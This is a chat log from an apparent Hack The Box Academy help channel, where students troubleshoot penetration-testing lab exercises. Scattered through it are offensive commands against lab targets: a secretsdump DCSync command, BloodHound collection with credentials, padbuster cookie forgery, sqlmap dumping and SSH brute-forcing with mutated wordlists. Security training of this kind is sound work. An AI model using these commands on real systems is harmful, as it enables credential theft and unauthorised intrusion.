#modules
I thought this was the command for dcsync
Here is some additional information
Script Output
Token Req Status: <Response [200]>
Request Date: Thu, 25 Jan 2024 02:43:44 GMT
Dt Object: 2024-01-25 02:43:44
Time Stamp Request Translated: 1706175824000
System Time: 1706150624000
Sample Code of the Time Conversion
import requests
from datetime import datetime
from time import time

data = {"submit": "htbuser"}
date = requests.post(url, data)  # url is defined earlier in the script (not shown)
# Parse the HTTP Date header, e.g. "Thu, 25 Jan 2024 02:43:44 GMT"
dt_object = datetime.strptime(str(date.headers["Date"]), "%a, %d %b %Y %H:%M:%S %Z")
print("Token Req Status:", date)
print("Request Date:", str(date.headers["Date"]))
print("Dt Object:", dt_object)
# dt_object is a naive datetime, so .timestamp() interprets it as local time rather than GMT
print("Time Stamp Request Translated:", int(dt_object.timestamp()) * 1000)
print("System Time:", int(time()) * 1000)
exit()
secretsdump can also dcsync, read the section again
Tried
What is the DRSUAPI approach?
😦 feel that
think about which machine you should be targeting and what credentials you should use
no not @ you
idk how you're passing the timestamp to your script but it should be something like dt_now = datetime.strptime(timestamp, "%Y-%m-%d %I:%M:%S%p")
you're literally targeting the same machine with the same creds, you're not listening
think about which machine you should be targeting and what credentials you should use
What machine should I be targeting?
the logistics.inlanefreight.local
there's literally a -target-exec argument
All that gave me was the admin hash
as I've said, use the admin hash to dcsync
Do I crack the hash first?
Or is this a PTH?
What module are you doing
I am super confused, I followed along and performed the module all the way to the end and I have no idea what's going on now
child to parent compromise from linux
I see xreous already told you to use secretsdump
the problem is you're only following the steps without understanding what they're doing
I just opened the section and it’s literally the first thing I see
which is also given in the dcsync section
secretsdump.py -h
Kali on my windows machine just has impacket-secretsdump before you ask where secretsdump.py is
Mate
Do this command
And see how the tool works
Blindly copy pasting stuff won’t get you anywhere
Output of that command literally has an authentication section
Okay, so I googled it as suggested and found this
You have a Kerberos ticket?
-k uses Kerberos authentication
I don't understand how this breaks down:
secretsdump.py hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-ntlm -just-dc-user bross
where does the hacker username come from? what is academy-ea-dc01.inlanefreight.local?
help me god
You could also have used the -hashes switch with the ntlm hash
error: a tunnel is already using this interface name. Please use a different name using the --tun option
anyone here know how to solve this ? (ligolo)
But where do the hacker username and dc01.inlanefreight.local come in?
Seems you already have it set up?
yeah , the problem , when I try to double pivot
So what would that command have looked like?
I got the session but can't start it
Did you read the section?
make a new interface first
ip tuntap add user <user> mode tun <AnyName>
ip link set <AnyName> up
then start --tun <AnyName>
it's the new multi tunnel feature for ligolo
should I make new interface with each session ?
if you want to have multiple tunnels then yes
Didn’t know that
or you can stop your current tunnel and connect to the new one, apparently that also works
Yes
The section uses LOGISTICS.INLANEFREIGHT.LOCAL
I can't if I stop the session , I lose connection with the target
Is there an article about it? Or mentioned on their GitHub
apparently not I've been told, before the update that's what it does except is automatic
if you connect to the second session and start a new session: you're able to reconnect
yeah it's on github
This didn't work with the hash
you still technically are connected to both sessions: it's just stupid
Alright, thanks
yeah stop just mean stop the tunnels, not the agent on the other side
Did you read what format it wants?
and the target is also wrong
I tried with and without quotes
the old automatic switch method would stop the old tunnel and start a new tunnel ¯\_(ツ)_/¯
nice it seems like connect with 1000s of networks at the same time
why are you targeting .240???
yeah, they only want the hash
What should I be targeting?
What are you targeting with a dcsync attack?
hammer
Domain controller?
So?
target the flipping domain controller of the parent domain
Should it be 172.16.5.5?
Try and see
And here we see a wild xreous, slowly losing his temper
Oh my GOD it WORKED!
Who would’ve thought
I have no idea what that other command I used first from my google search was doing, but now I kind of understand what I did.
Don't understand the difference between the two IPs though
Uhh
It only gave me the machine IP for the question, so I'm just assuming based on the ones they used in the examples on the section
one is the domain controller, the other is not
I think you should go back to the start of the ad module tbh
no both is, just two domains and two DCs
in the module as a whole- whenever you had to target the DC, it was with the 172.16.5.5 IP
well yes, but most of the attacks were on the .5
yeah .5 is the right target, .240 is the child domain DC which doesn't have the user needed to answer the question
Seems like there's no rhyme or reason to this
So then why would the logistics.inlanefreight.local not work?
Hey! Anyone free to help me out with the Logrotate part of the Linux Privilege Escalation module? I'll explain what I've done so far in pm to not spoil to others 🙂
Is that the name of the child domain?
I have no idea, wish there was a map
I'm assuming it's the child domain
Domain controller, then inlanefreight.local, then logistics.inlanefreight.local
at least that's how I have it mapped in my head
Go back and read the domain trust primer section
you can create a network map/write one down
So why does it not work with logistics.inlanefreight.local?
That's where I got the hash
can someone explain to me how to ssh in htb academy?
ssh user@ip
prompt for password: [ctrl+shift+v] (paste the password provided here)
it's a security feature that it doesn't show as you type
tysm
it's basics
im noob xd
i'm aware ¯\_(ツ)_/¯
you can also use google; if google doesn't help then you can ask here. Learning how to do your own research will improve your odds of retaining knowledge
i was searching in google but i didnt find anything
nah hahaha
would have been better :)
if you add things like "in htbacademy" you'll likely run into a bunch of random forum posts unrelated to your query
Question regarding Windows Privilege escalation skills assesment part 1.
||So I managed to get a SYSTEM level reverse shell using JuicyPotato, but it took a long time because I was trying to use nc64.exe instead of nc.exe which is probably 32bit? Why didn't the nc64.exe work? I spent like 2 hours figuring out that priv esc and the answer was that I was using the wrong version of nc. I just wanna know why that happened||
If the system is 32 bit, a 64 bit won't work
@fathom pendant This is from sysinfo: System Type: x64-based PC
You can run 32 on a 64 but you can't run 64 on a 32
¯\_(ツ)_/¯
Could also be limitations
Guess I'll just try both versions in the future if the first one wont work
Just to be sure
32 bit is usually the safer bet
Okay I'll keep that in mind
nc64 should work, maybe you got a broken version
Yeah I redownloaded it and my original version seems to be broken. Now it worked with 64bit version too. Thanks, should have checked this much earlier but better learn later than never
IP in the modules isn’t refreshing. I also cannot access target. I have submitted a ticket. Anyone else having issues?
Is anyone available for a dm? I've been stuck on Password Attack Lab - Hard for 2 days now and I've tried the recommendations given but still no progress.
What did you try so far?
Crackmapexec, msf6 smb login, and hydra for user|| johanna using the mutated list. Tried for smb, rdp and winrm.||
||Mutated list|| should work try again
I've tried it several times over the past few days with cme on smb, winrm and rdp and the brute force just goes on for hours.
Hello,
I have a question related to SMB null sessions on a domain joined computer.
Will this allow us to enumerate users, groups?
Any other recommendations?
you can rid brute iirc, but can't query a list of users/groups
check your DMs
@next bronze oh ok, thanks a lot
Since it worked on a domain controller, I thought it would be doable as well on a domain joined host
OK this is going to be a long one and any help that can be offered will be greatly appreciated. On 3rd day of struggling with this. On the Active Directory Enumeration and Attacks Skill Assessment Part 1 || On Webshell I uploaded my mimikatz and rev shell using web shell. I then ran "setspn -Q MSSQLSvc/SQL01.inlanefreight.local:1433" got "existing SPN Found", I then activate my rev shell through metasploit and when running mimikatz I get tickets for 4-40a50000-web-win01$@LDAP~DC01.INLANEFREIGHT.LOCAL and not for svc_sql , so confused on what I am doing wrong || I will delete this once I get an answer, thanks, after 10+ hours I am at my wits end
which question is that and what are you trying to do
"Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer" I got the account name, just failing in Kerberoasting part, not finding them in memory even after using setspn
you want to use the manual method? did you run New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ...?
but seriously, just use automated tools like powerview/rubeus/impacket/netexec, any of these will get you what you want
hey can i ask some questions to any of you here in dms its about msfconsole
Hello. Can anyone help me with the footprinting module, DNS section. I'm on the last question. I completed all the other questions using zone transfers to get the info. Now I'm on "What is the FQDN of the host where the last octet ends with 'x.x.x.203'?" but I don't see any 203 octets in my results.
The hint seems to suggest I use a tool like dnsenum. I've tried most of the wordlists in SecLists/Discover/DNS and am still getting nothing back with a 203 octet.
Any ideas?
DM me
Not sure what I am doing wrong:
" Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop. "
The command I executed :
||"bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u sapsso@inlanefreight.local -p pabloPICASSO||"
https://academy.hackthebox.com/module/143/section/1509
Have you tried to bruteforce any of the subdomains to see if you get any results?
did you pivot
the DC looks to be in an internal network
Nope. Would I pivot with this address?
ah then no need, can you ping the target?
yes.
try running bloodhound-python with -ns <ip>
The attack host is already on the same network as the targets if i'm not mistaken
it looks more like a problem with the pwnbox itself, have you tried resetting it?
I’m down too idk what is going on over there
Welcome to HackTheBox Academy! It depends on your goals to be honest. What you aim to use academy for? If you're into pentesting you should go the CPTS path, if you're into bug bounty go CBBH path
so possibly reset the Pwnbox, SSH into the Pwnbox (which is the attack IP) and run that bloodhound command again?
I've done all of that and used multiple browsers, deleted my cache and everything. It is 100% something on their end that is messing up
yes I have and I only get x3 subdomains back none of which are 203 octet
i'm thinking to study just the modules
did you try running it with -ns <dc-ip>
Maybe change the wordlist? Remember the hint, you're on the right track
Yeah but what do you aim to study, i mean which topics? I would suggest to get a student membership also, really a steal at the price you pay
i've tried nearly all the wordlists in SecLists. Do i really need some outside of that?
ok thx bro
They don't give you the dc-ip(unless dc-ip is the 172 address on the internal attack machine)...only the name of the domain controller(└──╼ $bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u sapsso@inlanefreight.local -p pabloPICASSO)
Are you trying in the Discovery/DNS folder? If so, what you're looking for is there. I just checked
yh im working my way through them. Ill keep going
which browsers
Hello Guys I'm new in this server and I have 0 knowledge about hacking. Could anybody guide me what should I do in order to learn the skills?
Chrome and edge
Ip doesn’t load with time rate. Ping doesn’t work. Taking ip and curling it doesn’t work, cannot display ip addy via browser
I’ve submitted a ticket about 5 hours ago for some reason they are super slow to respond today.
try pinging google
Sup Climax! Welcome to HackTheBox Academy! What do you aim to learn here?
ping the fqdn or nslookup
Hi I want to learn fundamental knowledge about hacking
Tech support must be off today
That's cool man, hacking is way harder than TV shows or Hollywood make it out to be. Way more frustrating too. But it gets easier, you have to study and learn a lot and that's the hard part, but it does get easier.
I would recommend following the Information Security Foundations path. You can find it here https://academy.hackthebox.com/paths or on the menu on the left side of your screen by going Paths -> Skill Paths
It is made up of the following modules:
Introduction to Academy
Learning Process
Setting Up
Linux Fundamentals
Windows Fundamentals
Introduction to Windows Command Line
Introduction to Bash Scripting
Introduction to Networking
Intro to Network Traffic Analysis
Introduction to Active Directory
Introduction to Web Applications
Web Requests
After that you can go the CPTS path, CBBH path if you're into web or bug bounty, or go SOC Analyst route if you're into blue team.
I'd recommend a student subscription if you're a student to get the most out of academy.
Thank you so much
Is there anyone here that works at HTB, or mods that know someone. I submitted a ticket 6 hours ago with no response. What’s going on over there ?
dude. a day is a reasonable wait time, it's also off office hours for them
You're welcome, if you have any trouble or get stuck you can ask for help in this channel. Remember to state what you have tried so far, and if possible provide which command you're running or what you're trying to do. Makes it easier for you to get help
I see. What time zone
uk
Okay Thank you
That makes sense
eu2 works btw, just spawned a lab with 5 machines
I’m on HTB labs
I dont think they have 24 hour ops
North America
This channel isnt for help or complaints about htb labs my dude, read #welcome on how to access more of the server
Thank you
Im trying to start the machine in pass the hash thats in password attacks module and it doesnt start, is something wrong with the site or is it me?
It’s not just you buddy
aight bet, shit been bugging me
Probably just you. But it's likely the site it's been a mess since last seasonal lab dropped
I sent a message hours and hours ago
Try changing vpn region
ok bet
They're likely handling lots of complaints regarding the issues atm
Similar infra
Thank you Marcie appreciate it
It is what it is can’t always be perfect things happen
there's only so many support staff to handle the numerous people complaining about shit breaking ¯\_(ツ)_/¯
I have to look at the seasonal labs. I’ve been doing the Academy. Haven’t really checked anything else.
Where do I ask a question if I'm stuck on a question in a module?
here
pretty sure ive tried every one now and still nothing
Go after one of the subdomains that you find with a zone transfer
DM, and i'll give you a clearer hint
I mean if they enumerated with a zone transfer for a list of subdomains available then the next step is easy ¯\_(ツ)_/¯
I'm on the Linux Fundamentals module. I cannot find where a directory name "mail" is, or what they are talking about in regards to "mail."
env
@fathom pendant thanks, let me try that
Then look for a variable that would correlate to mail
Thanks @fathom pendant
still have problems with spawning target on tunnelling module
🤬
Does anyone have the same problems?
Have you tried changing vpn region?
I have the list of sub domains under int****.inlanefreight.htb but running them through dnsenum or trying manual zone transfers all just give errors. Unless I’m doing something wrong syntax wise
I told you. Stop looking at internal
Look at just the base domain
Start there
Just dig axfr inlanefreight.htb @ip
I think I told you the other day when you were struggling. To stop looking there
I’ve done this too. Think you’re thinking of someone else. I started this section only today
I’m pretty sure I have tried other stuff and dns enum just errors. I’m away from my desk now so I’ll try later
Just gotta be patient, let the command finish before ruling it out
You're likely to get some cannot reverse lookup error or Whatever it says
But if it doesn't stop the command then it's not a fatal error
Hey guys in the Pivoting, Tunneling, and Port Forwarding Module I performed the Web Pivot with Rpivot and managed to get the flag through curl, however firefox would not work through proxychains even though I configured it to localhost port 9050. I was wondering if there was a way to fix this
Strange, when you tried firefox did it give you an error?
Is the proxychains.conf file configured correctly? Did you follow all the examples correctly?
I remember doing this module and things went swimmingly really
firefox itself would pull up, but it would just load, however an error would pull up saying the socket was timing out.
I think i mapped proxychains to the correct port, im basing this assumption off the fact that I used proxychains when I curled the page, wouldnt that fail as well if the .conf file was configured incorrectly?
Can someone help me with https://academy.hackthebox.com/module/58/section/517 ? I can't seem to get the cookie value for question 2. I've tried python3 sqlmap.py -u http://94.237.54.50:45516/case3.php --cookie="id=*" --flush-session and receive "the parameter is vulnerable" but no flag. If anyone can help I'd appreciate it.
you haven't got any retrieval options, try --dump but remove the --flush-session. it caches its results if you don't flush it, and will start data retrieval immediately
I got it now thank you for your help.
Thank you
GOt it now
Hello, I am needing help with "introduction to bash scripting" in the academy. I am following the material decently, but I can't figure out how to run the bash code in the terminal.
like open a terminal and type it?
kindof, it wants me to edit this code, and come up with an answer
#!/bin/bash
# Count number of characters in a variable:
echo $variable | wc -c
# Variable to encode
var="nef892na9s1p9asn2aJs71nIsm"
for counter in {1..40}
do
var=$(echo $var | base64)
done
but when I copy and paste the code into the terminal, it attempts to run it in a weird way and I get a bunch of errors
Hello, I'm doing the Linux Privilege Escalation module and I'm having trouble with the Kernel Exploits section. I've compiled the exploit code that the module refers to on the target machine, but when I run it I get an error saying "error: permission denied". I've attempted to exploit it using MSF as well without any success. Anyone willing to give me some input?
is there somewhere that i should be editing the bash code that isnt in the terminal?
vim or nano
nano file.txt
or vim file.txt
Is it a good idea to use --batch --dump for most uses of sqlmap?
Hey, guys, DNS question. How can I know that I'm fetching data with a zone transfer from a primary DNS server and not a secondary? I struggle to distinguish between DNS servers, name servers, resolvers etc.
depends, if it's a small db sure, but if it's big and you're using something slow like time based it will take forever. in that case you can query what database and tables are there and dump the specific table
yeah def above for --dump. --batch simply takes the default options for any user input sqlmap needs (after the initial command execution obv). i usually keep it on for convenience, the majority of the time you'll want the defaults
only time its annoying is when it auto tries to crack hashes, and its just a bunch of bcrypt ones or something
hey guys, do u maybe know if it's possible to use mssqlclient.py with a username and its hash?
and what is the correct syntax
cause I didn't understand from the help ....
yes, its the same format as all impacket scripts
-hashes :<nthash>
may I DM?
no just ask here
thats...bizarre
is there something I miss?
Would I ask for help with the starting point boxes here?
you would not
youd follow directions in #welcome to verify your account and then youll gain access to #starting-point and can ask there
thanx
thank you!
np and congrats on being able to read
you dont know how many people come in asking similar stuff and freak out when told this isnt the correct place lmao
using something like "-T table --dump" for larger DBMSs?
yep
thanks
HTTPs/TLS Attacks
Skills Assessment
I am able to decode the user cookie, but when I try to recreate a plain text cookie I get issues.
command:
||padbuster http://<IP>/admin "<cookie>" 16 -encoding 1 -cookies "user=<cookie>" -usebody -error 'Decryption failed' -plaintext "user=admin"||
Results:
||Encrypted value is: 6a25b6eb723fffd50c12065d2689f6d500000000000000000000000000000000|| Cookie does not work at /token endpoint.
Gotta feeling I am going to get roasted for this but I am getting this error when attempting to SSH in Permission denied (publickey).
did you give permission to the key?
Which module /section
also post the output of your command or the results
@soft cedar lol wait ignore me, I have covid currently and am loopy. Its creds for the web server.
Damn man is US 1 still not working? Tired of using EU
Its on the fritz
heyo just checking that im a dumbass, just trying to start the first part and the walkthrough is in linux, im on windows, please dont tell me I have to get linux
just use the pwnbox
Im poor though
then you should use a VM
and the guide for that is where?
Most of what is covered here and elsewhere regarding this topic is LINUX based
one sec
here you go https://google.com
thanks man
im only an hour into this and want to jump out of a window
The computer experience
anyone experiencing issues with spawning Target machine?
Got VM installed
got Ubuntu
but it says it doesnt have enough disk space to install the browser
in setting I gave "system" I gave it like 20 gigs cause it wasnt working
@rustic sage
the hell do I do now?
huh?
??
You should make sure you're installing everything correctly. There is loads of info online to show you how
idk what to tell you without more info. it's probably online somewhere tho. Anyhow,I don't use ubuntu
No Access
Why does your about me say you're part of an online terrorist organization? And that I should report you to the admins at once?
Ah wait
hi there, anyone else is having some trouble to spawn lab exercises machines?
LMAO
Just found it buried in some dumb setting
anyway gonna scuttle this account and go off the grid, thanks
Been an issue for a while now. Just give it a couple minutes to spawn
I've spent more than 20 mins spawning the Print Operators/WinPrivEsc lab exercise
Why are these targets taking so long to spawn?!😒
HTB has had issues with spawning lately that have supposedly been fixed but I still see mass people having issues
hi guys
Doing Documentation & Reporting Practice Lab
to access to 172.16.5.5 from target machine, should I do initial foothold for local user? or provided?
I have some users id no password
i need help
With what
Linux Privilege Escalation Environment Enumeration
I got flag in root folder then i submit but incorrect answer :/
Why are you escalating?
environment enumeration
Yes
That wasn't a yes or no question
I was asking why, if you read the question maybe you'll understand why it's wrong
Because i found flag.txt in root folder
Read the question. The root flag is for a later part
Ops hahahaha
Literally reading a question will help you figure out why you're dumb lol
Even though linux priv esc module is tier II you get 100 cubes 🤩
what ? how ?
The IPMI cracking in the footprinting section is taking forever. I'm not sure if I'm impatient or if I'm doing it incorrectly. The hash is definitely selected as the target and I'm using rockyou. I disabled hashcat's potfile too so that the program should stop and display the password.
If it ever cracks it ;-;.
I tried googling it too and using an online hash cracker to check if it was an easy one but guess I'll have to wait (?) minutes/hours until a password matches my hash.
😦
Maybe an errata?
you are the only one who had this +100 cubes, i guess
I was happy after seeing +100 cubes now I am sad
I bought on platinum, for next will gold suffice? for CPTS path
idk, I use student subscription
ohk
ok so
like 4 hours in
finally got the vm working
How do I get openvpn to function
openvpn vpnfile.ovpn
I believe sudo apt-get install openvpn or something similar. Depends which distro you are using. Now is a good time to practice your Google skills! You're gonna need em.
Yeah I got that far, but its asking for m1
sudo *
asking for what?
^ yeah use sudo
You type in the root password now
You won't see the letters as you type for privacy reasons.
what distro did you install? either you would've set it or its the default
It just seems he may not know what sudo is. New to Linux.
ah mb
ubuntu
It's okay though Google will help anyone you're confused too. It can be confusing the first time using sudo and not seeing your letters come up.
Oh wait they dont show up
Fr happened
Got it got it
Had to look
Yeah I imagine it's pretty common when you've never used Linux. On windows most people just click run as administrator and click yes.
Probably similar for Mac too. But I'm not a Mac user.
IT WORKED
I was so confused at first glance when I tried on the VM
Connected to the VPN now?
Then saw it was normal
got it installed
very nice, now just need to yoink a vpn key and connect to it
got it
are you wanting to do academy or starting point?
Hey, has anyone completed and possibly has notes on the ipmi section of the footprinting module? This password is not being cracked for the life of anything, I would really appreciate some help.
so wait I got the whole "sudo apt-get" thing, what now?
sorry, might've misspoke. if you're completely new to linux, I'd prob recommend the linux fundamentals module on academy first
Academy with information security foundations is too good
otherwise starting point is going to be very frustrating
what are you trying to do?
The apt-get command only fetches repositories that contain programs and files
Get open vpn working
yeah?the opvn?
Fr guys any help with this module section? I've lost my patience cracking this password. I've tried the 10k dictionary and have had rockyou going for about an hour, but only up to a max of 20 mins while I've tried other stuff
got it
The password cracking is the most frustrating.
I'm not ever sure if I have the right wordlist to get it fast, like ofc rockyou is probably going to get it but after an eternity and a half. I let the whole 10k slide and it didn't find the pw.
no clue sorry vendetta, im sure someone will pop up eventually whose done it
True cracks 10k. Found by using locate pass | grep common.
marcies almost always lurking somewhere 
And alright I appreciate it. That is the most annoying part though is the password cracking, at least in my experience.
In normal pentesting I don't mind of course cause that's part of the process, but here on the modules I feel like it's holding me from progressing.
absolutely certain you're supposed to crack that hash?
(this isnt a hint, i have no clue of the module content, just checking)
"Cipher negotiation is disabled since neither P2MP client nor server mode is enabled"
Absolutely certain. I got this password hash leaked from the IPMI server and just need to crack it. I used a hash checker and found it was SHA1 too to verify.
did the module give you a wordlist to use?
So yeah it's like I have the password hash, I know how to crack it, but it is taking forever so I'm not sure if there's a better wordlist to use or what.
It did
Let me try to use that. But I think it was for a previous section of the module not related to ipmi
mm maybe, afaik modules are very fond of reusing things like that
I'll give it a shot and let you know
It's just a list of 100 first names so it's unlikely but we will see
is your vm connected to the internet?
uhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
oh yeah prob not then mb
one second
well the browser works and the Ethernet works too, so
yes
Sigh, I cancelled my rockyou scan at try 11k and tried the 101 items from the modules wordlist and no dice ... 😢 That really hurts lmao.
ok so yeah
I even used the ipmi_passwords.txt and that didn't work!
we may have been abandoned Vendetta
You're fine if you haven't done the module you can't really help. 💀 But Jesus do I want to die rn because of cracking.
We could ping em?
What's your problem? Are you connected to the VPN? Are you connected to the Internet?
VM has internet
But "Cipher negotiation is disabled since neither P2MP client nor server mode is enabled"
That happens when running your openvpn command?
What command did you run
What program gave you that error output?
It shouldn't say that when you run sudo openvpn file.ovpn
And Jesus I still can't get this hash to crack. 😭
Computers fucking suck
As anyone who has ever done tried to do something not suggested by the manufacturer knows
Ok so wait, did that and got "In [CMD-LINE] : 1 : Error opening configuration file: file.opvn"
So your path to the file is messed up
Just open a command window in the directory you have the file downloaded, and just use the name and not the path
in the directory where I have the file downloaded?
help guys... i can nmap nfs and listing some files, but mount doesnt work. it says incorrect mount option specified
Yes. Probably in your downloads. Go to your downloads in the file explorer and Shift + right click the empty space and click open terminal here
got it
thanks man
Working now?
checking rn
I've still not cracked this password I'm beyond pissed 😂 this is a really shitty situation as Google isn't even really helping me out. The command in the module literally isn't working and many similar commands using hashcat keep giving me problems
Ok so what do I enter now?
tried the early stuff but just got it all jumbled up
WAIT IT WORKED
Has anyone else experienced issues with the machine on the LLMNR poisoning from windows section of the AD module? I am about to complete the entire CPTS path and haven't ever been able to RDP successfully to it after actual weeks of intermittent attempts lol.
Ok so yeah it worked
How you can connect to the machines that you spawn in htb!
did you quote everything properly?
Thank god, it only took me five hours but I can actually do the part thats supposed to be fucking hard
some commands in the module don't work for me. i had to quote them
anyone? probably just me seeing this
As in the xfreerdp command? I think the rdp connection goes through but all I have ever gotten is a black screen.
Normally I just have to wait a few minutes on the other machines to RDP and the black screen goes away, but that just has never happened even after like an hour of waiting on this one, it is bizarre
oh, i get that pretty often. you have to retry, and switch vpn
sometimes i have to retry the same thing 20 times before it works
Module XSS Section Phishing
I ran xsstrike and got the payload escape character as '> but could not understand why '> is the escape character instead of ">
creating the instance is taking hella long
God damn I finally got the password cracked. The module gives examples of hashcat but they DO NOT WORK. I used msf to output a jtr hash file and rip the hash from there with the top million password dictionary.
Ppl still having some issues with the load time of the instances it seems
damn
For me is working fine for now
😅
The rage was real 😭
Hey how do you install Nmap?
cause i tried "rpm -vhU https://nmap.org/dist/nmap-7.94-1.x86_64.rpm" but it aint working
Did you try sudo apt install nmap
black screen usually means the remote computer went to sleep 
when on the black screen try hitting enter a few times
yeah i dont think you're gonna have a very fun time trying to do this on ubuntu, you'll have to install most of the tools its talking about
id recommend parrot or kali, kalis more supported but parrots affiliated with htb
up to you ofc, i just find installing shit tedious
parrots not too bad, you're just using it for htb right?
yeah
its the same os as on the pwnbox, so if you've come from that, might be an idea
got a link?
This guide will cover the following steps:
thanks
the iso downloads just on the parrot website, think theres a htb specific version
Wow last time I checked there wasnt an HTB specific ver.
And there is it now
wait jan 24 2024, release date
nvm
thats just the ver
for some reason it doesn't have a search bar like the normal parrot, but that could just be a skill diff on my part
omg they have torrent, thats illegal, oh no guys
Idk what happened to my VM cause it disappeared so suddenly after updating it (was VMware Workstation), gonna use VirtualBox this time
"Unattended Guest OS install setup"?
wheres this showing up?
Scratch that fixed it
That documentation was really good
Thanks man
AND IT ONLY TOOK ME 7 HOURS
how many of us got jobs from htb ?
everyone in this server is a htb employee
I like to install to a USB instead of use a VM. Been using pwnbox for academy though cause it's all in one place.
lmao
hey wassup i ran my own payload on my main comp just to test it out so i hope nothing happens to it right ? (i made the payload in kali machine and used victim comp as my main)
Hello all!
I'm stuck with: module/67/section/642
Windows Privilege Escalation -> SeTakeOwnershipPrivilege
Task: Leverage SeTakeOwnershipPrivilege rights over the file located at "C:\TakeOwn\flag.txt" and submit the contents
But the current user (htb-student) doesn't have the privilege 'SeTakeOwnershipPrivilege' =/
Stuck on
ATTACKING COMMON APPLICATIONS: Attacking WordPress
Question:
Using the methods shown in this section, find another system user whose login shell is set to /bin/bash.
I have found the two users with admin access admin and dXXX and also the flag, but can't find the user for the above.
Needs a little nudge..!!
check /etc/passwd
reset the target
Reset 3 times, without changes 😦
oh, read the section on how to enable it
This privilege can be enabled if it is in the "Disabled" status. In my case, the user basically doesn’t have it
cat
ahh sorry sorry
open powershell as administrator
Thanks..!
Thanks..!
Thank you!
nice was gonna check it myself, been a while since I did that module
Hey !
When I try to connect to HTB Academy with OpenVPN it gets connected.
But after a few minutes, it keeps restarting
I deleted the VPN file, downloaded it again, changed the server and downloaded again, but it still shows restart. Only when I shut down my entire VM and start it again does it work.
Do anyone has any permanent solution for it?
Reach out to support
module211 section2274. I have entered "admin*" as the answer that comes in the KQL query after "user.name:". It is showing as a wrong answer. Also, is it possible to upload a screenshot here?
did it last night so it was fresh in my memory 😉
Hello everyone! I am stuck on Nibbles as part of the Academy module "Getting Started". I'm essentially following the walkthrough and I'm getting as far as echoing an IP to monitor.sh but when I do monitor.sh is suddenly not recognised and if I try sudo it still asks for the password.
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the port that one of the two C2 callback server IPs used to connect to one of the compromised machines. Enter it as your answer.
Intrusion Detection With Splunk (Real-world Scenario)
I need some help for that, what I have done filter the C2 IP, and Compromised Machine IP with some rulename, but none of the port is right
There is something i dont really understand. My user account is in the administrator group
but i can still not access the administrator folder?
i can clearly see my username when i do net localgroup administrator
ok, open a new powershell and run as administrator, and now use that powershell to access administrator folder
brainfart
i was stuck on that it wanted the administrator password
didnt know i could just "for more options" and see my account
lol, that would have made things a lot faster. I was trying to pop shells on each
does anyone know what the Weekly Streak brings? They say it gives special rewards. But what does this mean? And how high does the streak need to be? Is there a public list?
it hasn't been decided yet
thanks
anyone done the + 0 Search the file system for a file containing a password. Submit the password as your answer. on windows privesc that could give a hand?
i've found a password in ||powershell logs|| but it isnt valid.
as well as i've tried the different techniques that they showed
maybe im missing something obvious but yeah
i can send the password i am trying in dms to you
i just need a sanity check here
found it
i was in a directory too deep
Hi everyone! I just finished the Skill Assessment for the "WINDOWS EVENT LOGS & FINDING EVIL" module. I completed all of the questions using the Get-WinEvent command. Should I practice investigating with the rest of the tools mentioned on the module (I guess that should be a bit more chunky, but I do not want to miss any important practice 😅 )?
It doesn’t hurt to practice, but they are more for you to understand how to do it the slow way, the next modules will introduce you to SIEM solution that make working with logs much more comfortable and enjoyable
Is there an issue with Evil-WinRM? I am trying to connect with some creds I found with crackmapexec and even tried them with -x, but I am getting some SSL error with Evil-WinRM.
Might need to update your openssl
I have latest on my parrot. Says 3.0.11
I also tried with the -S switch but neither works
Makes me wonder if it's the server having an older version
Does "Life Left" also have a bug in your questions? No more timer appear for me, just the word "minute(s)"
Linux Privilege Escalation - Kernel Exploits
i downloaded the exploit to the machine and ran
gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit
when i tried running ./kernel_exploit i get permission denied error
Do you mind sending me a dm with the exploit you are trying with @warped cloak
@warped cloak sudoed? su?
tried that still doesnt work
hi im on kerberos attack skill assessment question 2
Which machine has unconstrained delegation?
already has d* cred, but i can't use rdp
is it expected ?
I have troubles with Attacking Common Services - Attacking FTP. First question
I checked the solution but i can't get the same result, i think the machine is blocking some ports
rdp isn't always available
Hey all, I'm currently doing the Login Brute Forcing module and am having trouble with Service Authentication Brute Forcing. I've cracked the b.gates creds with hydra but when I attempt to authenticate via ssh I get an error message Permission denied (publickey). How do I solve this?
I am doing password mutation exercise in password attacks module and I generated a lot of words using the provided password list and rule as prescribed and removed doubles using the provided command
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
But after over 15 minutes I got no hits brute forcing the SSH for the user sam
netexec ssh 10.129.207.211 -u sam -p mut_password.list
if you are having issue with the answer then hint you can't submit the $ thing as a part of the name lol but if you are having issue with RDP, from my note the *jack* user is one of the only user that can RDP i think
You're not supposed to use b.gates for this one, try using the employee name found in the previous assessment.
already try another way, i got s*
but now stuck in question 3
hint you are on the right path but cut the first 17000 words of your mutated wordlist
let move this part to DM to avoid spoiler if you still need help with that
ok
hey mate, thanks but it's the first question which specifies b.gates? "Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag?"
The error I get is:
$ ssh b.gates@94.237.54.75
The authenticity of host '94.237.54.75 (94.237.54.75)' can't be established.
ECDSA key fingerprint is SHA256:vLawvWBkAM0HMyfB8uEnoXPFYuOJmJsTT4U7R0+ApSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '94.237.54.75' (ECDSA) to the list of known hosts.
b.gates@94.237.54.75: Permission denied (publickey).
Go after a different service
*with difference tools, cme and netexec can but isn't for brute forcing
Ssh isn't a good target service to brute when others are available
agreed, but on what every service brute forcing with netexec will be slow af
Other services can be faster than ssh :)
Enumeration is always the key to success
that is a good idea, some test faster
Can someone advise if my syntax is correct for smtp-user-enum?
I'm trying to increase the default seconds to wait for a reply but nothing I do seems to work.
